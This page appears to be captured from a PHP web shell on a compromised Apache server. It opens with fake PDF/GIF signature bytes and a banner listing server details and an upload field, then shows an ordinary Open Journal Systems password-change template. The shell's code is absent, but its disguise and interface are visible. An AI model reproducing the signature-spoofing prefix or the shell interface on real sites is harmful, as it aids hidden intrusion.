%PDF-1.7 GIF89;
| Server IP : 104.20.45.2 / Your IP : 172.16.20.3 Web Server : Apache/2.4.25 (Debian) System : Linux f64a392e70de 5.4.0-216-generic #236-Ubuntu SMP Fri Apr 11 19:53:21 UTC 2025 x86_64 User : application ( 1000) PHP Version : 5.6.40 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /app/templates/user/ |
Upload File : |
{**
* templates/user/changePassword.tpl
*
* Copyright (c) 2013-2019 Simon Fraser University
* Copyright (c) 2003-2019 John Willinsky
* Distributed under the GNU GPL v2. For full terms see the file docs/COPYING.
*
* Form to change a user's password.
*
*}
{strip}
{assign var="pageTitle" value="user.changePassword"}
{url|assign:"currentUrl" page="user" op="changePassword"}
{include file="common/header.tpl"}
{/strip}
<div id="changePassword">
<form method="post" action="{url op="savePassword"}">
{include file="common/formErrors.tpl"}
{if $implicitAuth}
<p><span class="instruct">{translate key="user.profile.implicitAuthChangePasswordInstructions"}</span></p>
{/if}
<p><span class="instruct">{translate key="user.profile.changePasswordInstructions"}</span></p>
<table class="data" width="100%">
<tr valign="top">
<td width="20%" class="label">{fieldLabel name="oldPassword" key="user.profile.oldPassword"}</td>
<td width="80%" class="value"><input type="password" name="oldPassword" id="oldPassword" value="{$oldPassword|escape}" size="20" class="textField" /></td>
</tr>
<tr valign="top">
<td class="label">{fieldLabel name="password" key="user.profile.newPassword"}</td>
<td class="value"><input type="password" name="password" value="{$password|escape}" id="password" size="20" class="textField" /></td>
</tr>
<tr valign="top">
<td></td>
<td><span class="instruct">{translate key="user.register.passwordLengthRestriction" length=$minPasswordLength}</span></td>
</tr>
<tr valign="top">
<td class="label">{fieldLabel name="password2" key="user.profile.repeatNewPassword"}</td>
<td class="value"><input type="password" name="password2" id="password2" value="{$password2|escape}" size="20" class="textField" /></td>
</tr>
</table>
<p><input type="submit" value="{translate key="common.save"}" class="button defaultButton" /> <input type="button" value="{translate key="common.cancel"}" class="button" onclick="document.location.href='{url page="user" escape=false}'" /></p>
</form>
</div>
{include file="common/footer.tpl"}